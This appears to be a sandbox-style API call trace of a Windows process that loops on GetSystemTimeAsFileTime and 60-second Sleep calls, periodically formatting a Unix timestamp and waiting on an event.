	[0230.111] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70fede20, dwHighDateTime=0x1d50a6a)) 
	[0230.111] Sleep (dwMilliseconds=0xea60) 
	[0230.117] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x71013f80, dwHighDateTime=0x1d50a6a)) 
	[0230.117] Sleep (dwMilliseconds=0xea60) 
	[0230.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7103a0e0, dwHighDateTime=0x1d50a6a)) 
	[0230.132] Sleep (dwMilliseconds=0xea60) 
	[0230.148] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x71060240, dwHighDateTime=0x1d50a6a)) 
	[0230.148] Sleep (dwMilliseconds=0xea60) 
	[0230.164] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x710863a0, dwHighDateTime=0x1d50a6a)) 
	[0230.165] Sleep (dwMilliseconds=0xea60) 
	[0230.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x710ac500, dwHighDateTime=0x1d50a6a)) 
	[0230.186] Sleep (dwMilliseconds=0xea60) 
	[0230.196] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x710d2660, dwHighDateTime=0x1d50a6a)) 
	[0230.196] Sleep (dwMilliseconds=0xea60) 
	[0230.212] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x710f87c0, dwHighDateTime=0x1d50a6a)) 
	[0230.212] Sleep (dwMilliseconds=0xea60) 
	[0230.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7111e920, dwHighDateTime=0x1d50a6a)) 
	[0230.234] Sleep (dwMilliseconds=0xea60) 
	[0230.244] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x71144a80, dwHighDateTime=0x1d50a6a)) 
	[0230.244] Sleep (dwMilliseconds=0xea60) 
	[0230.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7116abe0, dwHighDateTime=0x1d50a6a)) 
	[0230.257] Sleep (dwMilliseconds=0xea60) 
	[0230.274] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x71190d40, dwHighDateTime=0x1d50a6a)) 
	[0230.274] Sleep (dwMilliseconds=0xea60) 
	[0230.288] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x711b6ea0, dwHighDateTime=0x1d50a6a)) 
	[0230.288] Sleep (dwMilliseconds=0xea60) 
	[0230.303] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x711dd000, dwHighDateTime=0x1d50a6a)) 
	[0230.303] Sleep (dwMilliseconds=0xea60) 
	[0230.320] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x71203160, dwHighDateTime=0x1d50a6a)) 
	[0230.320] Sleep (dwMilliseconds=0xea60) 
	[0230.335] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x712292c0, dwHighDateTime=0x1d50a6a)) 
	[0230.335] Sleep (dwMilliseconds=0xea60) 
	[0230.350] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7124f420, dwHighDateTime=0x1d50a6a)) 
	[0230.350] Sleep (dwMilliseconds=0xea60) 
	[0230.366] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x71275580, dwHighDateTime=0x1d50a6a)) 
	[0230.366] Sleep (dwMilliseconds=0xea60) 
	[0230.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7129b6e0, dwHighDateTime=0x1d50a6a)) 
	[0230.382] Sleep (dwMilliseconds=0xea60) 
	[0230.398] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x712c1840, dwHighDateTime=0x1d50a6a)) 
	[0230.398] Sleep (dwMilliseconds=0xea60) 
	[0230.413] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x712e79a0, dwHighDateTime=0x1d50a6a)) 
	[0230.413] Sleep (dwMilliseconds=0xea60) 
	[0230.431] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7130db00, dwHighDateTime=0x1d50a6a)) 
	[0230.431] Sleep (dwMilliseconds=0xea60) 
	[0230.481] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7137ff20, dwHighDateTime=0x1d50a6a)) 
	[0230.481] Sleep (dwMilliseconds=0xea60) 
	[0230.491] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x713a6080, dwHighDateTime=0x1d50a6a)) 
	[0230.491] Sleep (dwMilliseconds=0xea60) 
	[0230.506] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x713cc1e0, dwHighDateTime=0x1d50a6a)) 
	[0230.506] Sleep (dwMilliseconds=0xea60) 
	[0230.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x713f2340, dwHighDateTime=0x1d50a6a)) 
	[0230.522] Sleep (dwMilliseconds=0xea60) 
	[0230.538] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x714184a0, dwHighDateTime=0x1d50a6a)) 
	[0230.538] Sleep (dwMilliseconds=0xea60) 
	[0230.553] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7143e600, dwHighDateTime=0x1d50a6a)) 
	[0230.553] Sleep (dwMilliseconds=0xea60) 
	[0230.569] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x71464760, dwHighDateTime=0x1d50a6a)) 
	[0230.569] Sleep (dwMilliseconds=0xea60) 
	[0230.584] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7148a8c0, dwHighDateTime=0x1d50a6a)) 
	[0230.584] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557866245\r\n") returned 12
	[0230.584] ResetEvent (hEvent=0xc) returned 1
	[0230.585] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0233.087] Sleep (dwMilliseconds=0xea60) 
	[0233.096] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72c7e620, dwHighDateTime=0x1d50a6a)) 
	[0233.096] Sleep (dwMilliseconds=0xea60) 
	[0233.112] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72ca4780, dwHighDateTime=0x1d50a6a)) 
	[0233.112] Sleep (dwMilliseconds=0xea60) 
	[0233.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72cca8e0, dwHighDateTime=0x1d50a6a)) 
	[0233.128] Sleep (dwMilliseconds=0xea60) 
	[0233.143] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72cf0a40, dwHighDateTime=0x1d50a6a)) 
	[0233.143] Sleep (dwMilliseconds=0xea60) 
	[0233.159] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72d16ba0, dwHighDateTime=0x1d50a6a)) 
	[0233.159] Sleep (dwMilliseconds=0xea60) 
	[0233.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72d3cd00, dwHighDateTime=0x1d50a6a)) 
	[0233.174] Sleep (dwMilliseconds=0xea60) 
	[0233.194] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72d62e60, dwHighDateTime=0x1d50a6a)) 
	[0233.194] Sleep (dwMilliseconds=0xea60) 
	[0233.205] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72d88fc0, dwHighDateTime=0x1d50a6a)) 
	[0233.205] Sleep (dwMilliseconds=0xea60) 
	[0233.221] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72daf120, dwHighDateTime=0x1d50a6a)) 
	[0233.221] Sleep (dwMilliseconds=0xea60) 
	[0233.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72dd5280, dwHighDateTime=0x1d50a6a)) 
	[0233.237] Sleep (dwMilliseconds=0xea60) 
	[0233.252] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72dfb3e0, dwHighDateTime=0x1d50a6a)) 
	[0233.252] Sleep (dwMilliseconds=0xea60) 
	[0233.267] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72e21540, dwHighDateTime=0x1d50a6a)) 
	[0233.267] Sleep (dwMilliseconds=0xea60) 
	[0233.283] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72e476a0, dwHighDateTime=0x1d50a6a)) 
	[0233.283] Sleep (dwMilliseconds=0xea60) 
	[0233.299] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72e6d800, dwHighDateTime=0x1d50a6a)) 
	[0233.299] Sleep (dwMilliseconds=0xea60) 
	[0233.314] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72e93960, dwHighDateTime=0x1d50a6a)) 
	[0233.314] Sleep (dwMilliseconds=0xea60) 
	[0233.365] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72f05d80, dwHighDateTime=0x1d50a6a)) 
	[0233.365] Sleep (dwMilliseconds=0xea60) 
	[0233.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72f2bee0, dwHighDateTime=0x1d50a6a)) 
	[0233.377] Sleep (dwMilliseconds=0xea60) 
	[0233.392] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72f52040, dwHighDateTime=0x1d50a6a)) 
	[0233.392] Sleep (dwMilliseconds=0xea60) 
	[0233.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72f781a0, dwHighDateTime=0x1d50a6a)) 
	[0233.408] Sleep (dwMilliseconds=0xea60) 
	[0233.424] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72f9e300, dwHighDateTime=0x1d50a6a)) 
	[0233.424] Sleep (dwMilliseconds=0xea60) 
	[0233.440] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72fc4460, dwHighDateTime=0x1d50a6a)) 
	[0233.440] Sleep (dwMilliseconds=0xea60) 
	[0233.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x72fea5c0, dwHighDateTime=0x1d50a6a)) 
	[0233.455] Sleep (dwMilliseconds=0xea60) 
	[0233.470] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73010720, dwHighDateTime=0x1d50a6a)) 
	[0233.470] Sleep (dwMilliseconds=0xea60) 
	[0233.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73036880, dwHighDateTime=0x1d50a6a)) 
	[0233.486] Sleep (dwMilliseconds=0xea60) 
	[0233.501] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7305c9e0, dwHighDateTime=0x1d50a6a)) 
	[0233.501] Sleep (dwMilliseconds=0xea60) 
	[0233.517] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73082b40, dwHighDateTime=0x1d50a6a)) 
	[0233.517] Sleep (dwMilliseconds=0xea60) 
	[0233.533] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x730a8ca0, dwHighDateTime=0x1d50a6a)) 
	[0233.533] Sleep (dwMilliseconds=0xea60) 
	[0233.548] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x730cee00, dwHighDateTime=0x1d50a6a)) 
	[0233.548] Sleep (dwMilliseconds=0xea60) 
	[0233.573] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x730f4f60, dwHighDateTime=0x1d50a6a)) 
	[0233.573] Sleep (dwMilliseconds=0xea60) 
	[0233.580] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7311b0c0, dwHighDateTime=0x1d50a6a)) 
	[0233.580] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557868048\r\n") returned 12
	[0233.580] ResetEvent (hEvent=0xc) returned 1
	[0233.580] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0233.581] Sleep (dwMilliseconds=0xea60) 
	[0233.595] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73141220, dwHighDateTime=0x1d50a6a)) 
	[0233.595] Sleep (dwMilliseconds=0xea60) 
	[0233.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73167380, dwHighDateTime=0x1d50a6a)) 
	[0233.611] Sleep (dwMilliseconds=0xea60) 
	[0233.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7318d4e0, dwHighDateTime=0x1d50a6a)) 
	[0233.626] Sleep (dwMilliseconds=0xea60) 
	[0233.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x731b3640, dwHighDateTime=0x1d50a6a)) 
	[0233.644] Sleep (dwMilliseconds=0xea60) 
	[0233.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x731d97a0, dwHighDateTime=0x1d50a6a)) 
	[0233.657] Sleep (dwMilliseconds=0xea60) 
	[0233.673] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x731ff900, dwHighDateTime=0x1d50a6a)) 
	[0233.673] Sleep (dwMilliseconds=0xea60) 
	[0233.692] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73225a60, dwHighDateTime=0x1d50a6a)) 
	[0233.692] Sleep (dwMilliseconds=0xea60) 
	[0233.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7324bbc0, dwHighDateTime=0x1d50a6a)) 
	[0233.705] Sleep (dwMilliseconds=0xea60) 
	[0233.720] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73271d20, dwHighDateTime=0x1d50a6a)) 
	[0233.720] Sleep (dwMilliseconds=0xea60) 
	[0233.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73297e80, dwHighDateTime=0x1d50a6a)) 
	[0233.736] Sleep (dwMilliseconds=0xea60) 
	[0233.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x732bdfe0, dwHighDateTime=0x1d50a6a)) 
	[0233.752] Sleep (dwMilliseconds=0xea60) 
	[0233.767] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x732e4140, dwHighDateTime=0x1d50a6a)) 
	[0233.767] Sleep (dwMilliseconds=0xea60) 
	[0233.782] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7330a2a0, dwHighDateTime=0x1d50a6a)) 
	[0233.782] Sleep (dwMilliseconds=0xea60) 
	[0233.798] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73330400, dwHighDateTime=0x1d50a6a)) 
	[0233.798] Sleep (dwMilliseconds=0xea60) 
	[0233.813] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73356560, dwHighDateTime=0x1d50a6a)) 
	[0233.813] Sleep (dwMilliseconds=0xea60) 
	[0233.829] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7337c6c0, dwHighDateTime=0x1d50a6a)) 
	[0233.829] Sleep (dwMilliseconds=0xea60) 
	[0233.845] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x733a2820, dwHighDateTime=0x1d50a6a)) 
	[0233.845] Sleep (dwMilliseconds=0xea60) 
	[0233.860] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x733c8980, dwHighDateTime=0x1d50a6a)) 
	[0233.860] Sleep (dwMilliseconds=0xea60) 
	[0233.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x733eeae0, dwHighDateTime=0x1d50a6a)) 
	[0233.876] Sleep (dwMilliseconds=0xea60) 
	[0233.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73414c40, dwHighDateTime=0x1d50a6a)) 
	[0233.892] Sleep (dwMilliseconds=0xea60) 
	[0233.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7343ada0, dwHighDateTime=0x1d50a6a)) 
	[0233.907] Sleep (dwMilliseconds=0xea60) 
	[0233.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73460f00, dwHighDateTime=0x1d50a6a)) 
	[0233.924] Sleep (dwMilliseconds=0xea60) 
	[0233.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x734ad1c0, dwHighDateTime=0x1d50a6a)) 
	[0233.956] Sleep (dwMilliseconds=0xea60) 
	[0233.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x734d3320, dwHighDateTime=0x1d50a6a)) 
	[0233.970] Sleep (dwMilliseconds=0xea60) 
	[0233.986] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x734f9480, dwHighDateTime=0x1d50a6a)) 
	[0233.986] Sleep (dwMilliseconds=0xea60) 
	[0234.000] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7351f5e0, dwHighDateTime=0x1d50a6a)) 
	[0234.000] Sleep (dwMilliseconds=0xea60) 
	[0234.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73545740, dwHighDateTime=0x1d50a6a)) 
	[0234.016] Sleep (dwMilliseconds=0xea60) 
	[0234.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7356b8a0, dwHighDateTime=0x1d50a6a)) 
	[0234.032] Sleep (dwMilliseconds=0xea60) 
	[0234.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73591a00, dwHighDateTime=0x1d50a6a)) 
	[0234.047] Sleep (dwMilliseconds=0xea60) 
	[0234.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x735b7b60, dwHighDateTime=0x1d50a6a)) 
	[0234.063] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557869849\r\n") returned 12
	[0234.063] ResetEvent (hEvent=0xc) returned 1
	[0234.063] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0234.110] Sleep (dwMilliseconds=0xea60) 
	[0234.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x736500e0, dwHighDateTime=0x1d50a6a)) 
	[0234.125] Sleep (dwMilliseconds=0xea60) 
	[0234.143] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73676240, dwHighDateTime=0x1d50a6a)) 
	[0234.143] Sleep (dwMilliseconds=0xea60) 
	[0234.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7369c3a0, dwHighDateTime=0x1d50a6a)) 
	[0234.156] Sleep (dwMilliseconds=0xea60) 
	[0234.172] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.172] Sleep (dwMilliseconds=0xea60) 
	[0234.192] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x736e8660, dwHighDateTime=0x1d50a6a)) 
	[0234.192] Sleep (dwMilliseconds=0xea60) 
	[0234.203] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7370e7c0, dwHighDateTime=0x1d50a6a)) 
	[0234.203] Sleep (dwMilliseconds=0xea60) 
	[0234.254] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73780be0, dwHighDateTime=0x1d50a6a)) 
	[0234.254] Sleep (dwMilliseconds=0xea60) 
	[0234.266] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x737a6d40, dwHighDateTime=0x1d50a6a)) 
	[0234.266] Sleep (dwMilliseconds=0xea60) 
	[0234.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x737ccea0, dwHighDateTime=0x1d50a6a)) 
	[0234.282] Sleep (dwMilliseconds=0xea60) 
	[0234.297] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x737f3000, dwHighDateTime=0x1d50a6a)) 
	[0234.297] Sleep (dwMilliseconds=0xea60) 
	[0234.312] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73819160, dwHighDateTime=0x1d50a6a)) 
	[0234.312] Sleep (dwMilliseconds=0xea60) 
	[0234.328] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7383f2c0, dwHighDateTime=0x1d50a6a)) 
	[0234.328] Sleep (dwMilliseconds=0xea60) 
	[0234.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73865420, dwHighDateTime=0x1d50a6a)) 
	[0234.344] Sleep (dwMilliseconds=0xea60) 
	[0234.359] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7388b580, dwHighDateTime=0x1d50a6a)) 
	[0234.359] Sleep (dwMilliseconds=0xea60) 
